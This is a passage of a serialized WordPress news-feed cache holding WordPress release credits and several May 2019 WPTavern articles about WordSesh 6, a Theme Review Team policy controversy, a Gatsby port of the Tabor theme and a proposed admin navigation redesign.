href="https://profiles.wordpress.org/nielsdeblaauw">nielsdeblaauw</a>, <a href="https://profiles.wordpress.org/nnikolov">Nikolay Nikolov</a>, <a href="https://profiles.wordpress.org/rabmalin">Nilambar Sharma</a>, <a href="https://profiles.wordpress.org/ninio">ninio</a>, <a href="https://profiles.wordpress.org/notnownikki">notnownikki</a>, <a href="https://profiles.wordpress.org/bulletdigital">Oliver Sadler</a>, <a href="https://profiles.wordpress.org/onlanka">onlanka</a>, <a href="https://profiles.wordpress.org/pandelisz">pandelisz</a>, <a href="https://profiles.wordpress.org/parkcityj">parkcityj</a>, <a href="https://profiles.wordpress.org/swissspidy">Pascal Birchler</a>, <a href="https://profiles.wordpress.org/pbearne">Paul Bearne</a>, <a href="https://profiles.wordpress.org/pbiron">Paul Biron</a>, <a href="https://profiles.wordpress.org/pedromendonca">Pedro Mendon&#231;a</a>, <a href="https://profiles.wordpress.org/peterbooker">Peter Booker</a>, <a href="https://profiles.wordpress.org/peterwilsoncc">Peter Wilson</a>, <a href="https://profiles.wordpress.org/pfiled">pfiled</a>, <a href="https://profiles.wordpress.org/pilou69">pilou69</a>, <a href="https://profiles.wordpress.org/pranalipatel">Pranali Patel</a>, <a href="https://profiles.wordpress.org/pratikthink">Pratik</a>, <a href="https://profiles.wordpress.org/pratikkry">Pratik K. Yadav</a>, <a href="https://profiles.wordpress.org/presskopp">Presskopp</a>, <a href="https://profiles.wordpress.org/psealock">psealock</a>, <a href="https://profiles.wordpress.org/punit5658">Punit Patel</a>, <a href="https://profiles.wordpress.org/bamadesigner">Rachel Cherry</a>, <a href="https://profiles.wordpress.org/rahmon">Rahmon</a>, <a href="https://profiles.wordpress.org/superpoincare">Ramanan</a>, <a href="https://profiles.wordpress.org/ramiy">Rami Yushuvaev</a>, <a href="https://profiles.wordpress.org/ramizmanked">Ramiz Manked</a>, <a href="https://profiles.wordpress.org/ramonopoly">ramonopoly</a>, <a href="https://profiles.wordpress.org/youknowriad">Riad Benguella</a>, <a href="https://profiles.wordpress.org/rinatkhaziev">Rinat Khaziev</a>, <a href="https://profiles.wordpress.org/noisysocks">Robert Anderson</a>, <a href="https://profiles.wordpress.org/rsusanto">Rudy Susanto</a>, <a href="https://profiles.wordpress.org/ryan">Ryan Boren</a>, <a href="https://profiles.wordpress.org/welcher">Ryan Welcher</a>, <a href="https://profiles.wordpress.org/sebastienserre">S&#233;bastien SERRE</a>, <a href="https://profiles.wordpress.org/saeedfard">Saeed Fard</a>, <a href="https://profiles.wordpress.org/salcode">Sal Ferrarello</a>, <a href="https://profiles.wordpress.org/salar6990">Salar Gholizadeh</a>, <a href="https://profiles.wordpress.org/samanehmirrajabi">Samaneh Mirrajabi</a>, <a href="https://profiles.wordpress.org/samikeijonen">Sami Keijonen</a>, <a href="https://profiles.wordpress.org/elhardoum">Samuel Elh</a>, <a href="https://profiles.wordpress.org/sgarza">Santiago Garza</a>, <a href="https://profiles.wordpress.org/saracope">Sara Cope</a>, <a href="https://profiles.wordpress.org/saracup">saracup</a>, <a href="https://profiles.wordpress.org/tinkerbelly">sarah semark</a>, <a href="https://profiles.wordpress.org/paragoninitiativeenterprises">Scott Arciszewski</a>, <a href="https://profiles.wordpress.org/coffee2code">Scott Reilly</a>, <a href="https://profiles.wordpress.org/sebastianpisula">Sebastian Pisula</a>, <a href="https://profiles.wordpress.org/ebrahimzadeh">Sekineh Ebrahimzadeh</a>, <a href="https://profiles.wordpress.org/sergeybiryukov">Sergey Biryukov</a>, <a href="https://profiles.wordpress.org/sergioestevao">SergioEstevao</a>, <a href="https://profiles.wordpress.org/sgastard">sgastard</a>, <a href="https://profiles.wordpress.org/sharifkiberu">sharifkiberu</a>, <a href="https://profiles.wordpress.org/shazdeh">shazdeh</a>, <a href="https://profiles.wordpress.org/shital-patel">Shital Marakana</a>, <a href="https://profiles.wordpress.org/sky_76">sky_76</a>, <a href="https://profiles.wordpress.org/soean">Soren Wrede</a>, <a href="https://profiles.wordpress.org/netweb">Stephen Edgar</a>, <a href="https://profiles.wordpress.org/stevenkword">Steven Word</a>, <a href="https://profiles.wordpress.org/subrataemfluence">Subrata Sarkar</a>, <a href="https://profiles.wordpress.org/sudar">Sudar Muthu</a>, <a href="https://profiles.wordpress.org/sudhiryadav">Sudhir Yadav</a>, <a href="https://profiles.wordpress.org/szepeviktor">szepe.viktor</a>, <a href="https://profiles.wordpress.org/miyauchi">Takayuki Miyauchi</a>, <a href="https://profiles.wordpress.org/karmatosed">Tammie Lister</a>, <a href="https://profiles.wordpress.org/themonic">Themonic</a>, <a href="https://profiles.wordpress.org/thomstark">thomstark</a>, <a href="https://profiles.wordpress.org/tfrommen">Thorsten Frommen</a>, <a href="https://profiles.wordpress.org/thrijith">Thrijith Thankachan</a>, <a href="https://profiles.wordpress.org/hedgefield">Tim Hedgefield</a>, <a href="https://profiles.wordpress.org/timwright12">Tim Wright</a>, <a href="https://profiles.wordpress.org/timothyblynjacobs">Timothy Jacobs</a>, <a href="https://profiles.wordpress.org/timph">timph</a>, <a href="https://profiles.wordpress.org/tmatsuur">tmatsuur</a>, <a href="https://profiles.wordpress.org/ohiosierra">tmdesigned</a>, <a href="https://profiles.wordpress.org/tmdesigned">tmdesigned</a>, <a href="https://profiles.wordpress.org/tz-media">Tobias Zimpel</a>, <a href="https://profiles.wordpress.org/tobiasbg">TobiasBg</a>, <a href="https://profiles.wordpress.org/tomharrigan">TomHarrigan</a>, <a href="https://profiles.wordpress.org/tonybogdanov">tonybogdanov</a>, <a href="https://profiles.wordpress.org/tobifjellner">Tor-Bjorn Fjellner</a>, <a href="https://profiles.wordpress.org/toro_unit">Toro_Unit (Hiroshi Urabe)</a>, <a href="https://profiles.wordpress.org/torres126">torres126</a>, <a href="https://profiles.wordpress.org/zodiac1978">Torsten Landsiedel</a>, <a href="https://profiles.wordpress.org/itowhid06">Towhidul Islam</a>, <a href="https://profiles.wordpress.org/liljimmi">Tracy Levesque</a>, <a href="https://profiles.wordpress.org/umang7">Umang Bhanvadia</a>, <a href="https://profiles.wordpress.org/vaishalipanchal">Vaishali Panchal</a>, <a href="https://profiles.wordpress.org/webfactory">WebFactory</a>, <a href="https://profiles.wordpress.org/westonruter">Weston Ruter</a>, <a href="https://profiles.wordpress.org/wfmattr">WFMattR</a>, <a href="https://profiles.wordpress.org/bahia0019">William ''Bahia'' Bay</a>, <a href="https://profiles.wordpress.org/earnjam">William Earnhardt</a>, <a href="https://profiles.wordpress.org/williampatton">williampatton</a>, <a href="https://profiles.wordpress.org/willscrlt">Willscrlt</a>, <a href="https://profiles.wordpress.org/wolly">Wolly aka Paolo Valenti</a>, <a href="https://profiles.wordpress.org/wrwrwr0">wrwrwr0</a>, <a href="https://profiles.wordpress.org/yoavf">Yoav Farhi</a>, <a href="https://profiles.wordpress.org/fierevere">Yui</a>, and <a href="https://profiles.wordpress.org/zebulan">Zebulan Stanphill</a>.\n\n\n\n<div class="wp-block-spacer"></div>\n\n\n\n<p>Also, many thanks to all of the community volunteers who contribute in the <a href="https://wordpress.org/support/">support forums</a>. They answer questions from people across the world, whether they are using WordPress for the first time or since the first release. These releases are more successful for their efforts!</p>\n\n\n\n<p>If you want learn more about volunteering with WordPress, check out&nbsp;<a href="https://make.wordpress.org/">Make WordPress</a>&nbsp;or the&nbsp;<a href="https://make.wordpress.org/core/">core development blog</a>.</p>\n\n\n\n<p>Thanks for choosing WordPress!</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 07 May 2019 21:03:35 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Matt Mullenweg";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:44;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:49:"WPTavern: Registration for WordSesh 6 Is Now Open";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89381";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:60:"https://wptavern.com/registration-for-wordsesh-6-is-now-open";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2136:"<div class="wp-block-image"><img /></div>\n\n\n\n<p>Registration for the sixth installment of WordSesh is <a href="https://wordsesh.com/live/">now open</a> and thanks to <a href="https://pantheon.io/">Pantheon</a>, those who attend the conference live will be able to watch all of the sessions for free. <a href="https://wordsesh.com/">WordSesh</a> is a virtual WordPress conference with speakers from around the world sharing knowledge. </p>\n\n\n\n<p>This year&#8217;s event has 14 speakers with topics that include, the benefits of being the first to market with a Gutenberg user course, three ways to embrace the entrepreneurial roller coaster, and the rhythms of remote teams. Ten of the presentations will be live with four pre-recorded sessions. </p>\n\n\n\n<p><a href="https://wpsessions.com/">WPSessions</a> will transcribe each presentation live and will also store the recordings so that registered members can view them at a later date. There will also be a virtual hallway track where participants can network with each other. </p>\n\n\n\n<p>If you&#8217;d like to watch with a group of people in the same physical location, WordSesh has a list of watch parties that are taking place. </p>\n\n\n\n<ul><li><strong>Lagos, Nigeria</strong>&nbsp;<a href="https://www.meetup.com/Lagos-WordPress-Meetup-Group/">Lagos WordPress Community</a></li><li><strong>Minneapolis, MN</strong>&nbsp;<a href="https://www.eventbrite.com/e/wordsesh-live-viewing-party-tickets-60473140792" target="_blank" rel="noreferrer noopener">Pantheon</a></li><li><strong>Mumbai, India</strong> <a href="https://www.meetup.com/WordPressMumbai/events/260313447/">WP Mumbai</a></li><li><strong>Palm Beach, FL</strong>&nbsp;<a href="https://www.meetup.com/WordPressPB">WP Palm Beach</a></li><li><strong>Scottsdale, AZ</strong>&nbsp;<a href="https://www.meetup.com/Arizona-WordPress-Group/events/260740429/">WP Arizona</a></li></ul>\n\n\n\n<p>If you&#8217;re hosting a watch party, you&#8217;re encouraged to contact WordSesh with the details so your event can be added to the list. WordSesh 6 begins May 22nd at 9:30AM Eastern on <a href="https://www.crowdcast.io">Crowdcast</a>.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 07 May 2019 20:45:44 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:45;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:158:"WPTavern: Theme Review Team Leadership Implements Controversial Changes to Trusted Authors Program, Requiring Theme Reviews in Exchange for Making Themes Live";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89363";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:168:"https://wptavern.com/theme-review-team-leadership-implements-controversial-changes-to-trusted-authors-program-requiring-theme-reviews-in-exchange-for-making-themes-live";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:8638:"<p>The WordPress Theme Review team has implemented a controversial change to its <a href="https://make.wordpress.org/themes/2018/04/30/trusted-authors-program/" rel="noopener noreferrer" target="_blank">Trusted Authors Program</a> that puts a hard requirement on participants to join the theme review team and perform a minimum number of reviews in order to continue having their own themes fast tracked through the review process.</p>\n<p>&#8220;As we can’t figure out a way to bring in new reviewers and maybe keep them on-board after the initial reviews, we decided to make a few changes to the Trusted Authors program,&#8221; Alexandru Cosmin said, on behalf of the Theme Review team leadership.</p>\n<p>&#8220;Trusted Authors will need to review one ticket a month to be able to have their themes set live. Not doing a review doesn’t mean that you’ll lose your privileges or that you’ll have to re-apply. You’ll just not be able to have your themes set live until you finish a review.&#8221;</p>\n<p>The Trusted Authors program was put in place a year ago with the goal of streamlining the review process for authors who consistently produce high quality code in line with the current guidelines. The idea was to relieve some of the burden for theme reviewers and reduce the queue. </p>\n<p>Trusted Authors are required to do a full review of a parent theme (no child themes permitted). Themes that are not approved will not count. After performing the review, the author may then upload a theme and add a comment to it with a link to their latest review that meets the requirement.</p>\n<p>The change to the program is controversial, based on the feedback from other members of the Theme Review team who commented on the <a href="https://make.wordpress.org/themes/2019/05/07/trusted-authors-changes/" rel="noopener noreferrer" target="_blank">announcement</a>. </p>\n<p>&#8220;I understand the reason behind it, but I cannot agree with it,&#8221; WordPress theme author <a href="https://wordpress.org/themes/author/ilovewpcom/" rel="noopener noreferrer" target="_blank">Dumitru Brinzan</a> said. &#8220;Reviews should be done out of professional desire, not to buy a credit for setting a theme live quicker.</p>\n<p>&#8220;This might reduce the quality of reviews, because trusted authors are now directly interested in setting more themes live. This means that someone will have to monitor more closely the reviews done by trusted authors. This just feels unnatural somehow.&#8221;</p>\n<p>Justin Tadlock, a long-time review team member who volunteered as a lead for many years, said he is disappointed to see this idea resurface after he and others shot it down multiple times in the past.</p>\n<p>&#8220;I assume the team got permission from higher up the chain to run a pay-for-play system,&#8221; Tadlock said. &#8220;We’ve already <a href="https://make.wordpress.org/themes/2014/04/18/theme-review-incentive-program/" rel="noopener noreferrer" target="_blank">established they are not allowed</a>.</p>\n<p>&#8220;What such systems do is provide an unfair advantage to larger theme businesses with multiple employees. They assign one of their employees to handle a review and keep pumping out themes without missing a beat. All the while, solo developers are forced into &#8216;volunteering&#8217; with time they may not even have. Not that it’s fair to businesses either; it’s just worse on solo devs.&#8221;</p>\n<p>Tadlock also said that based on his experience with past incentives, forcing Trusted Authors to join the review team in order reap the benefits of the program will likely result in a decline in the quality of the reviews.</p>\n<p>&#8220;Making people contribute to the review system should absolutely never happen in any shape or form,&#8221; Tadlock said. &#8220;It should never be the means in which the team shows favoritism to one author/team over another.</p>\n<p>&#8220;And, when you tie incentive programs to the review system, you tend to get shit reviews. We’ve already seen this happen.&#8221;</p>\n<p>Tadlock referenced the <a href="https://make.wordpress.org/themes/2014/04/18/theme-review-incentive-program/" rel="noopener noreferrer" target="_blank">Theme Review Incentive program</a> that was implemented in 2014 which became highly controversial due to a number of underlying problems.</p>\n<p>&#8220;Basically, that program allowed the top reviewers to select the featured themes every month,&#8221; Tadlock said. &#8220;The original idea (at least from my understanding) would be that they&#8217;d select featured themes from the list of themes that they&#8217;d reviewed.  Instead, they chose their own themes, month after month.</p>\n<p>&#8220;What ended up happening is that many of those top reviewers would just burn through reviews, focusing on number rather than quality.  Bad, sometimes insecure, code would fall through the cracks.  Some themes really didn&#8217;t even get anywhere near a proper review.&#8221;</p>\n<p>In response to Tadlock referencing the past incentive program, Cosmin pointed out several differences with the new Trusted Author requirement to join the review team.</p>\n<p>&#8220;The last time we did this it was a competition for the Featured page (which in my opinion is of higher value than having a theme on Latest),&#8221; Cosmin <a href="https://make.wordpress.org/themes/2019/05/07/trusted-authors-changes/#comment-43743" rel="noopener noreferrer" target="_blank">said</a>. &#8220;Back then you also had to do a lot of reviews just to get the chance of selecting a featured theme.</p>\n<p>&#8220;With TAs you don’t lose anything, you either do or not the review, you keep your TA status. One review a month is just 15-30 minutes of reviewing. Either way they are still ‘pumping out themes without missing a beat.’ Any TA author that has time to pump out 3-4 themes a month also has time to do a freaking review.&#8221;</p>\n<h3>Theme Review Team Leadership Did Not Consult the Team Before Implementing Changes to Trusted Authors Program</h3>\n<p>This change to the Trusted Authors Program seems to have blindsided other members of the Theme Review Team who only learned of it from the announcement today. The idea was not discussed publicly in the #themereview channel on Slack. It was a unilateral decision made by the leadership behind closed doors. </p>\n<p>I asked Cosmin for background on the decision and he said it was discussed in a private meeting of Theme Review Team leads that included William Patton and Ganga Kafle. He said the decision just happened while they were discussing the current state of the <a href="https://themes.trac.wordpress.org/report/2" rel="noopener noreferrer" target="_blank">queue</a> and how things are not going well. </p>\n<p>There are 120 themes waiting to be reviewed and Cosmin estimated that authors are waiting approximately two months in order to get their themes approved. He said the changes to the Trusted Authors program are &#8220;currently the only viable option with short term results.&#8221; </p>\n<p>However, Tadlock is concerned that Trusted Authors who didn&#8217;t have the desire to review themes prior to the requirement might simply do the minimum possible to stay in the program. It also sets a precedent for requiring volunteer time in order to receive the benefit of a streamlined review.</p>\n<p>This particular controversy is another milestone in the Theme Review Team&#8217;s perennial struggle with an unmanageable queue. In the past, the team has entertained suggestions about relaxing the submission guidelines and limiting reviews to security concerns, but changes in this direction never seem to materialize. So far the team has had success with limiting authors to submitting one theme at a time. It slows the growth of the directory but makes the work more manageable for the volunteers who often find themselves knee-deep in manual code review without an end in sight.</p>\n<p>The new requirement for Trusted Authors to perform reviews in order to have their themes set live may still be up for discussion if other reviewers continue to raise concerns, but comments from the leads indicate that they want to give it a try before scrapping the idea. In response to Tadlock&#8217;s concern about the potential impact on the quality of reviews, Cosmin said the leadership will decide based on how the program goes.</p>\n<p>&#8220;It’s expected that TAs are experienced authors that know the requirements,&#8221; Cosmin said. &#8220;We’ll monitor this and if it’s the other way around, we’ll decide then. We get shit reviews right now without having any incentives.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 07 May 2019 19:15:56 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:46;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:72:"WPTavern: Tabor Theme Now Available as a Free Gatsby Theme for WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89336";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:83:"https://wptavern.com/tabor-theme-now-available-as-a-free-gatsby-theme-for-wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2407:"<p><a href="https://gatsbywpthemes.com/" rel="noopener noreferrer" target="_blank">Gatsby WordPress Themes</a>, a project launched earlier this year by a group of collaborators, has just released its second free theme. The team is led by Gatsby and GraphQL aficionados Zac Gordon, Jason Bahl, Muhammad Muhsin, Hussain Thajutheen, and Alexandra Spalato. Inspired by the scalability, speed, and security that the React-based static site generator can bring to WordPress, the team is working to make it easier for people to get their sites running on Gatsby, along with the WP GraphQL plugin.</p>\n<p>Rich Tabor&#8217;s &#8220;Tabor&#8221; theme has been ported over and &#8220;<a href="https://github.com/zgordon/tabor-gatsby-theme" rel="noopener noreferrer" target="_blank">Tabor for Gatsby</a>&#8221; is now available for free. After <a href="https://wptavern.com/godaddy-acquires-themebeans-coblocks-block-gallery-and-block-unit-tests" rel="noopener noreferrer" target="_blank">GoDaddy acquired ThemeBeans and CoBlocks</a>, the company made all the previously commercial themes available on GitHub, including Tabor. The theme primarily suits blogs and personal websites and became popular as one of the first themes to showcase the new Gutenberg editor.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/tabor-for-gatsby.png?ssl=1"><img /></a></p>\n<p>Check out the <a href="https://tabor-gatsby-theme.netlify.com/" rel="noopener noreferrer" target="_blank">Tabor for Gatsby theme demo</a> to see it in action with near-instantaneous page loads.</p>\n<p>The Gatsby WordPress Themes team credits <a href="http://thegatsbygal.com" rel="noopener noreferrer" target="_blank">Alexandra Spalato</a> for doing most of the work of porting this theme over to Gatsby. Tabor joins WordPress&#8217; default Twenty Nineteen theme in the collection. Muhammad Muhsin, the lead developer on the project, has written a <a href="https://javascriptforwp.com/porting-the-twenty-nineteen-wordpress-theme-to-gatsby/" rel="noopener noreferrer" target="_blank">tutorial</a> with an in-depth look at how he ported over Twenty Nineteen.</p>\n<p>Gatsby WordPress Themes has temporarily paused releasing new themes while the team works on upgrading the existing themes to V2. They currently only serve static content but V2 will add native comments, a contact form plugin, and Algolia search to all the themes.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 07 May 2019 03:31:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:47;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:78:"WPTavern: WordPress Designers Explore Proposal to Simplify WP Admin Navigation";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89319";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:89:"https://wptavern.com/wordpress-designers-explore-proposal-to-simplify-wp-admin-navigation";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4576:"<p>The admin can be intimidating to navigate if you&#8217;re just getting started with WordPress. After installing a few plugins, top-level menu items begin to pile on. This adds even more complexity to grapple with in a narrow space with long lists of items hidden behind flyout menus that make managing WordPress on mobile a frustrating experience. </p>\n<p>The admin dashboard design hasn&#8217;t changed significantly since the <a href="https://wordpress.org/plugins/mp6/" rel="noopener noreferrer" target="_blank">MP6 plugin</a> was merged into <a href="https://wptavern.com/wordpress-3-8-parker-released" rel="noopener noreferrer" target="_blank">WordPress 3.8</a> in 2013. This project brought updated typography and improved contrast to the admin but didn&#8217;t tackle the increasing complexity of admin navigation. </p>\n<p>A new <a href="https://core.trac.wordpress.org/ticket/47012" rel="noopener noreferrer" target="_blank">proposal on trac</a> aims to simplify the left sidebar navigation to improve accessibility, usability, and scalability by replacing the flyouts with accordion menus. Designer <a href="https://davemart.in/" rel="noopener noreferrer" target="_blank">Dave Martin</a> shared some mockups originally created by <a href="https://joen.wordpress.com/" rel="noopener noreferrer" target="_blank">Joen Asmussen</a>, and describes them as &#8220;a very early, exploratory concept.&#8221; </p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-06-at-11.32.11-AM.png?ssl=1"><img /></a></p>\n<p>Martin listed several reasons for exploring a new design, including the inaccessibility of the hover/flyout menus and how poorly they scale on mobile interfaces. He also cited the abundance of top-level menu items that are rarely used, which he said contributes to the cognitive weight of admin navigation by still being permanently visible.</p>\n<p>The major changes included in this proposal include the following:</p>\n<ul>\n<li>Flyout menus are replaced with accordion behavior. This scales all the way from mobile to desktop, and affords better accessibility.</li>\n<li>Menu is made 80px wider (240px vs. 160), affording a 14px minimum font size for all items, perhaps bigger icons in the future, more relaxed spacing, enhancing usability and accessibility.</li>\n<li>Sidebar is grouped in major sections, “Site”, “Design”, “Tools” and “Manage”.</li>\n<li>“Updates” are moved to a subsection of “Manage”, making Home a single item.</li>\n<li>Items related to content on your site (such as “Posts” and “Pages”) are moved under “Site”.</li>\n<li>Clicking major menu items just opens or closes the accordion, as opposed to go directly to the first subsection. This unifies the mobile and desktop behavior. You can keep the accordion open if you use it all the time (each click will save state, so you’ll see the same open/closed sections upon page refresh).</li>\n<li>All “Settings” subsections are moved under “Manage”, along with “Plugins &#038; Blocks” and “Users”.</li>\n<li>Separators group major categories, like “Site” and “Design” together</li>\n<li>Dashboard is renamed “Home”, because all of WordPress is a Dashboard, and “Home” is where you can get an overview at a glance.</li>\n</ul>\n<p>WordPress core committer John Blackbourn commented on the proposal, recommending further exploration of what the menu could look like for different user roles and whether that might affect the appearance, grouping, and behavior of the menu items. For example, roles with more limited publishing capabilities, such as a subscriber, would see very few menu items. </p>\n<p>There&#8217;s also a bit of discussion regarding the use of the word &#8216;Site&#8217; where some might better understand that section as &#8216;Content.&#8217; As this is just an initial mockup, nothing is set in stone and many iterations will likely follow.</p>\n<p>Even with many changes expected as the concept evolves, the proposed design significantly reduces cognitive load, especially for new users who may not be as familiar with the admin menu. An updated admin navigation design might lend itself well to being tested as a feature plugin. As with any major change in WordPress, there are many considerations for how it will affect plugin developers. Major visual overhauls like this are exciting, but it takes time to get it right. This proposal already shows a lot of promise but needs more feedback and participation from diverse user groups across the WordPress community. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 06 May 2019 20:20:37 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:48;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:53:"WPTavern: Gutenberg Plugin for OctoberCMS Now in Beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89297";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:64:"https://wptavern.com/gutenberg-plugin-for-octobercms-now-in-beta";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2833:"<p>Last week we reported on <a href="https://wptavern.com/laraberg-a-gutenberg-implementation-for-laravel-is-now-in-beta" rel="noopener noreferrer" target="_blank">Laraberg, a Gutenberg implementation for Laravel</a> that is now in beta. The project was based on <a href="https://github.com/front/gutenberg-js" rel="noopener noreferrer" target="_blank">Gutenberg.js</a>, a package that makes it easier to bring Gutenberg into other applications.   </p>\n<p><a href="ttps://reazzon.ru" rel="noopener noreferrer" target="_blank">Nick Khaetsky</a>, a backend developer at Biz-Mark, took Laraberg and used it to 